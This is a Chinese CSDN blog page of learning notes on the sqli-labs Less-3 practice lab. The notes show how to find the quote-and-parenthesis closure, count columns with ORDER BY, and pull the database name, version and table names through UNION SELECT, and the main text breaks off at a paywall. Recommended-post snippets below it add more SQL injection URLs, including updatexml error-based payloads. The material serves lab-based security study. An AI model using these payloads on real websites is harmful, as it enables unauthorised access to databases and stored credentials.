SQL练习(less-3)字符型注入& union联合查询

最新推荐文章于 2024-09-10 17:10:31 发布
最新推荐文章于 2024-09-10 17:10:31 发布
阅读量482 收藏
点赞数
分类专栏: SQL注入 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AmyBaby00/article/details/100090192
版权
本文是一篇关于SQL注入的学习笔记,通过一个实例展示了如何利用字符型注入和UNION查询来获取数据库信息。首先,通过错误信息推断出SQL闭合模式,然后使用`ORDER BY`来确定显示位。接着,利用UNION查询结合`DATABASE()`和`VERSION()`函数获取数据库名和版本。进一步,通过查询`INFORMATION_SCHEMA`表暴露出数据库的表名和字段,最后揭示了特定表中的用户和密码信息。
摘要由CSDN通过智能技术生成

本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动

http://127.0.0.1/sqli/Less-3/?id=1
在这里插入图片描述
输入?Id=1’后报错
根据报错信息“1”)
去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入中的由单引号和括号的闭合模式。
在这里插入图片描述order by 3 查看显示位
(3)并不是固定的,要去试的
在这里插入图片描述
union select 查询显示位
在这里插入图片描述
联合查询语句:Union select 1,database(),version() 查询当前数据库名及版本号
在这里插入图片描述union select 1,group_concat(table_name),3 from information_s

最低0.47元/天 解锁文章
SQL练习某书第6章--UNION/INTERSECT/EXCEPT
kylin_learn的博客
04-18 431
UNION(并集)/INTERSECT(交集)/EXCEPT(差集) 举个例子 但需要注意!!!!!!!!!!!!!集合之间连接每个select语句不能有orderby 如果非得用那么,用表表达式实现吧 练习 ...
SQL练习(less-6)字符&报错注入
AmyBaby00的博客
08-28 581
127.0.0.1/sqli/Less-6/?id=1 利用报错信息, 固定格式: Updatexml(a,Xpath,b) 在文档a,查找 Xpath 格式的内容 替换 b内容 Conact(a,b,c,…) 用来连接括号内的字符串 Id=1’ union select Updatexml(1,concat(0×7e,b) union select updatexml(1,concat(0...
sql注入less3
Mdcq123的博客
10-15 347
?id=1’) order by 3%23 http://192.168.197.146/sqli-labs/sqli-labs/Less-3/?id=-1’) union select 1,database(),3%23 http://192.168.197.146/sqli-labs/sqli-labs/Less-3/?id=-1’) union select 1,(select group_...
网络安全(sql注入2,为什么要构造闭合)
最新发布
m0_74096786的博客
09-10 283
构造闭合的本质原因是为了让我们好注入语句且不报错。
SQL注入sqlilabs:less-1
Dmajorcanon的博客
02-21 3783
sqlilabs个人练习及解题思路√
sql-libs——less3
bronze_s的博客
10-12 165
http://192.168.0.5:9002/Less-3/?id=5%27)%20order%20by%203%20–+ http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,2,3%20–+ http://192.168.0.5:9002/Less-3/?id=-5%27)%20union%20select%201,version(),database()%20–+ http://192.168.0.5:9002/Less-
sql-libs less3 答案详解
小白巨白的博客
01-17 578
1、首先对sql注入语句,进行判断,发现当输入数值时,不发生报错,当有单引号时,有错误进行。 sql语句的猜测: select * from 。。 where id=(‘’) 当自己添加‘)进行闭合时,发现整体式子依然成立 说明自己的sql 语句的大致含义正确 2、判断对应的注入点的个数 http://127.0.0.1/Less-3/?id=2’) order by 1、2、3–+ 当出现4的时候,发现错误,所以对应的列数共有3列 3、查找对应的注入点的位置 http://127.0.0.1/Les
SQL 注入-基于联合查询字符GET注入
xdjxi的博客
02-16 685
实验原理 字符GET注入,其注入点存在于URL的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类; http:/
SQL注入——Less-1-5(学习笔记)
xdjxi的博客
02-25 2292
第一关 1.经过语句and 1=2测试 ,页面回显正常,所以该地方不是数值查询 2.接着尝试在id后面加上',发现页面回显不正常,表示可能存在SQL字符注入 3.输入--+将sql后面的语句注视掉后,发现页面回显正常,则证明这个地方是单引号字符注入 4.接着使用order by 语句判断,该表一共有几列数据 order by 3页面回显正常,order by 4页面回显不正常,说明此表一个有3列。5.将id=1改为一个数据库不存在的id值,如861,使用union select 1...
sqli-labs初学(一):联合查询注入less-1&less-2
ajsdsapasom的博客
04-22 542
此篇为我个人练习,仅供大家参考,若有错误请及时指出! Sqli-labs是一个印度程序员写的,用来学习sql注入的一个游戏教程。博客地址为: http://dummy2dummies.blogspot.hk/,博客当有一些示例,国内很多博客内容都是从该作者的博客翻译过来的。同时该作者也发了一套相关的视频,在youtube上可以查看。ps:印度人讲英语口音太重了。。。。凑合着听懂点。 此处考虑到有些朋友不翻墙,遂分享到国内地址。 http://pan.baidu.com/s/1bo2L1JT
MySQL联合注入字符注入
m0_50211409的博客
03-27 1768
关于字符注入 首先我们都知道,在数据库字符串都是被单引号与双引号包裹起来的。 我们分析一下字符注入SQL语句 select*from admin where id='1' 这是字符注入后的语句 我们在传参的时候 ...
sqli-labs—————Less-3
Fly_鹏程万里
05-08 1806
Less-3根据提示传入参数id,数据类为numeric老样子,用单引号测试报错的内容为:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at...
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 806
初学sql注入SQLi-LABS过关分享Less-3
网络安全——基于联合查询字符GET注入
weixin_54055099的博客
09-08 622
SQL注入之基于联合查询字符GET注入
[网络安全]sqli-labs Less-3 解题详析
等风来
05-01 1953
以上为[网络安全]sqli-labs Less-3 解题详析,后续将分享[网络安全]sqli-labs Less-4 解题详析[网络安全]SQL注入原理及常见攻击方法简析我是秋说,我们下次见。
SQL注入sql-labs-Less3~Less37
TenG的博客
12-22 1035
前言: 本篇为sql-labs系类第4、5关讲解,由于有些语法第一关已经讲过,所以本篇涉及到前面的知识不讲解太细,不懂得语句可以参见此系列第一篇,不正确的地方欢迎指正。 关卡: Less-3、Less-4 正文: Less-3: 这里还是让sql语句在浏览器输出(自己在源码里面改,参见第一篇),可以看到sql语句id数值那里和第一关相比多了一对括号,如果我们只在数值后面加一个单引号就注入显然报错: 注意看输入的sql语句,注释符注释掉了后面的括号,所以注入的时候要在单引号后面加上括号形成闭合,如图:
SQL注入漏洞学习之二:SQLI-LABS闯关之Less-3和Less-4
m0_71839248的博客
06-10 759
SQLI-LABS闯关之Less-3和Less-4
sqli-lab教程Less-1
Brucye
03-22 439
学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema='security'(此处拿security库为例) 查字段:select column_name from information_schema.columns where table_name='users'(此处拿users表
LESS-3和LESS-4(sql注入
qq_44598397的博客
03-14 1607
LESS-3 源码: 1、输入?Id=1’后出现错误 错误提示为”2”)LIMIT 0,1’.去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入的由单引号和括号和起来的闭合模式。 2、输入:http://127.0.0.1/sqlilabs/Less-3/?id=2’)–+ url编码后:http://127.0.0.1/sqlilabs/Less-3/?...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值